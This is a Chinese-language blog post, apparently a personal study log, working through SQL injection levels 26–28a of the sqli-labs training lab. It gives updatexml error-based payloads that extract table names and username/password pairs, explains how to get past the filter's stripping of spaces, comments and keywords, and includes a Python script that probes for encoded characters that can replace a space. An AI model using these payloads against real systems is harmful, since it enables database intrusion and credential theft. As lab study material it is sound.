<!DOCTYPE html>
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="yanm1ng&#39;s blog">
  <meta name="keyword" content="hexo-theme, vuejs">
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      sqli-labs-Less26-28a | Hexo
    
  </title>
  <link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/tomorrow.min.css" rel="stylesheet">
  
<link rel="stylesheet" href="/css/style.css">

  
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.js"></script>
  
    
<script src="/js/qrious.js"></script>

  
  
  
  
    <!-- MathJax support START -->
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    <!-- MathJax support END -->
  


  
  
    
<script src="/js/local-search.js"></script>


<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>
<div class="wechat-share">
  <img src="/css/images/logo.png" />
</div>
  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>Hexo</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">Home</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/series/" class="item-link">Series</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">Tags</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">Archives</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/project/" class="item-link">Projects</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">About</a>
          
        </li>
      
      
        <li class="menu-item menu-item-search right-list">
    <a role="button" class="popup-trigger">
        <i class="fa fa-search fa-fw"></i>
    </a>
</li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">Home</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/series/" class="menu-link">Series</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">Tags</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">Archives</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/project/" class="menu-link">Projects</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">About</a>
            
          </li>
        
      </ul>
    </div>
    
      <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
            <span class="search-icon">
                <i class="fa fa-search"></i>
            </span>
            <div class="search-input-container">
                <input autocomplete="off" autocapitalize="off"
                    placeholder="Please enter your keyword(s) to search." spellcheck="false"
                    type="search" class="search-input">
            </div>
            <span class="popup-btn-close">
                <i class="fa fa-times-circle"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>
    
  </div>
</header>

    <div id="article-banner">
  <h2>sqli-labs-Less26-28a</h2>
  <p class="post-date">2021-10-26</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><p>方法仍然相同，都是替换被过滤的字符，新增的内容可能就是用python写脚本，不过都比较简单，目前我掌握的也还很片面。</p>
<span id="more"></span>
<h4 id="Less26-26a">Less26&amp;26a</h4>
<p>打开源码查看，可以看出Less26过滤了or、and、–、#、空格、斜线，过滤的还是挺多的，–、or和and我们已经知道怎么绕过了，所以该关主要学习后两种。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function blacklist($id)</span><br><span class="line">&#123;</span><br><span class="line">	$id= preg_replace(&#x27;/or/i&#x27;,&quot;&quot;, $id);			//strip out OR (non case sensitive)</span><br><span class="line">	$id= preg_replace(&#x27;/and/i&#x27;,&quot;&quot;, $id);		//Strip out AND (non case sensitive)</span><br><span class="line">	$id= preg_replace(&#x27;/[\/\*]/&#x27;,&quot;&quot;, $id);		//strip out /*</span><br><span class="line">	$id= preg_replace(&#x27;/[--]/&#x27;,&quot;&quot;, $id);		//Strip out --</span><br><span class="line">	$id= preg_replace(&#x27;/[#]/&#x27;,&quot;&quot;, $id);			//Strip out #</span><br><span class="line">	$id= preg_replace(&#x27;/[\s]/&#x27;,&quot;&quot;, $id);		//Strip out spaces</span><br><span class="line">	$id= preg_replace(&#x27;/[\/\\\\]/&#x27;,&quot;&quot;, $id);		//Strip out slashes</span><br><span class="line">	return $id;</span><br></pre></td></tr></table></figure>
<p>首先，我们先简单分析一下，学到这里，我们也已经知道注入的语句和流程了，–和#，分别是GET和POST的闭合关键字符，Less26是GET方式，而对于绕过–，我们也是掌握的了，说明该关主要是针对空格的绕过学习。</p>
<h5 id="updataxml方法">updataxml方法</h5>
<p>我们采用||来绕过代码，举例个查库和查表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;|| updatexml(1,concat(0x7e,(database())),1) || &#x27;1&#x27;=&#x27;1</span><br><span class="line">?id=1&#x27;|| updatexml(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema=&#x27;security&#x27;))),1) || &#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>
<p>但是这种方法在查字段的值有限制，只有前几个，不过我们可以通过改变id的值遍历所有数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;|| updatexml(1,concat(0x7e,(select (group_concat(concat_ws(0x7e,username,password))) from (security.users) where (id=x))),1) || &#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>
<p>不过可以发现这种方法下括号特别多，比较复杂，下面我们可以尝试采用将空格替换为编码字符的方法。</p>
<h5 id="URL编码">URL编码</h5>
<p>[]: <a target="_blank" rel="noopener" href="https://www.w3school.com.cn/tags/html_ref_urlencode.asp">https://www.w3school.com.cn/tags/html_ref_urlencode.asp</a>	“ASCII 编码参考手册”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">空格 = %a0；</span><br></pre></td></tr></table></figure>
<p>那除此之外，还有什么编码字符是可以替代空格的呢？我们用python写个脚本找出来。</p>
<h5 id="脚本-空格">脚本-空格</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"># -*- encoding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">for i in range(0, 256):</span><br><span class="line">    # print(i)</span><br><span class="line">    code = hex(i).replace(&#x27;0x&#x27;, &#x27;&#x27;)</span><br><span class="line">    if len(code) &lt; 2:</span><br><span class="line">        Code = &quot;0&quot; + code</span><br><span class="line">    code_0x = &quot;%&quot; + code</span><br><span class="line">    # print(Code_0x)</span><br><span class="line">    url = &quot;http://localhost/sqli-labs-master/Less-26/?id=1&#x27;&quot; + code_0x +&quot;%26%26&quot; + code_0x + &quot;&#x27;1&#x27;=&#x27;1&quot;</span><br><span class="line">    r = requests.get(url=url)</span><br><span class="line">    if &quot;Dumb&quot; in r.content.decode(&quot;utf-8&quot;, &quot;ignore&quot;):</span><br><span class="line">        print(code_0x)</span><br></pre></td></tr></table></figure>
<p><img src="/2021/10/26/sqli-labs-Less26-28a/1265.png" alt></p>
<p>从中我们可以找出替代空格的编码，我们知道是%a0，恰好是最后一个，不过这种方法适用于不知道的情况下。</p>
<p>Less26a与Less26的区别就是Less26a不会报错，因为源码中报错语句被注释掉了，其他就正常注入就好了。</p>
<h4 id="Less27-27a">Less27&amp;27a</h4>
<p>我们查看源码看过滤的字符有哪些，对于select和union我们可以使用大小写绕过，然后就可以用联合注入了，同时因为可以报错回显，所以updatexml方法也是可以的。</p>
<p><img src="/2021/10/26/sqli-labs-Less26-28a/%E6%BA%90%E7%A0%81.png" alt></p>
<p>Less27a也是注释掉报错回显，所有只能采用联合注入的方法，然后可以万能语句和时间盲注等方法判断注入方式。</p>
<h4 id="Less28-28a">Less28&amp;28a</h4>
<p>方法仍然相同，注入方式为‘），并且可以看过滤哪些，过滤的又有哪些被注释掉，以此作为需不需要替换的依据。</p>
</section>
    <!-- Tags START -->
    
    <!-- Tags END -->
    <!-- NAV START -->
    
  <div class="nav-container">
    <!-- reverse left and right to put prev and next in a more logic postition -->
    
      <a class="nav-left" href="/2021/10/26/sqli-labs-Less23-25a/">
        <span class="nav-arrow">← </span>
        
          sqli-labs-Less23-25a
        
      </a>
    
    
      <a class="nav-right" href="/2021/11/01/sqli-labs-Less29-32/">
        
          sqli-labs-Less29-32
        
        <span class="nav-arrow"> →</span>
      </a>
    
  </div>

    <!-- NAV END -->
    <!-- 打赏 START -->
    
      <div class="money-like">
        <div class="reward-btn">
          赏
          <span class="money-code">
            <span class="alipay-code">
              <div class="code-image"></div>
              <b>使用支付宝打赏</b>
            </span>
            <span class="wechat-code">
              <div class="code-image"></div>
              <b>使用微信打赏</b>
            </span>
          </span>
        </div>
        <p class="notice">若你觉得我的文章对你有帮助，欢迎点击上方按钮对我打赏</p>
      </div>
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    
      <div class="qrcode">
        <canvas id="share-qrcode"></canvas>
        <p class="notice">扫描二维码，分享此文章</p>
      </div>
    
    <!-- 二维码 END -->
    
      <!-- Utterances START -->
      <div id="utterances"></div>
      <script src="https://utteranc.es/client.js"
        repo=""
        issue-term="pathname"
        theme="github-light"
        crossorigin="anonymous"
        async></script>    
      <!-- Utterances END -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#Less26-26a"><span class="toc-nav-text">Less26&amp;26a</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#updataxml%E6%96%B9%E6%B3%95"><span class="toc-nav-text">updataxml方法</span></a></li><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#URL%E7%BC%96%E7%A0%81"><span class="toc-nav-text">URL编码</span></a></li><li class="toc-nav-item toc-nav-level-5"><a class="toc-nav-link" href="#%E8%84%9A%E6%9C%AC-%E7%A9%BA%E6%A0%BC"><span class="toc-nav-text">脚本-空格</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#Less27-27a"><span class="toc-nav-text">Less27&amp;27a</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#Less28-28a"><span class="toc-nav-text">Less28&amp;28a</span></a></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'http://example.com/2021/10/26/sqli-labs-Less26-28a/';
    var banner = ''
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

    // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', '/css/images/error_icon.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
      if (src !== '/css/images/error_icon.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()

        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })
  })();
</script>


  <script>
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });
  </script>






    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
  <p class="copyright">
    &copy; 2022 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a target="_blank" rel="noopener" href="https://github.com/yanm1ng">yanm1ng</a>
  </p>
</footer>

<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdnjs.cloudflare.com/ajax/libs/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine === 'false') {
        figure.find('.gutter').hide();
      }
      hljs.configure({useBR: true});
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->


<script src="/js/script.js"></script>


  </body>
</html>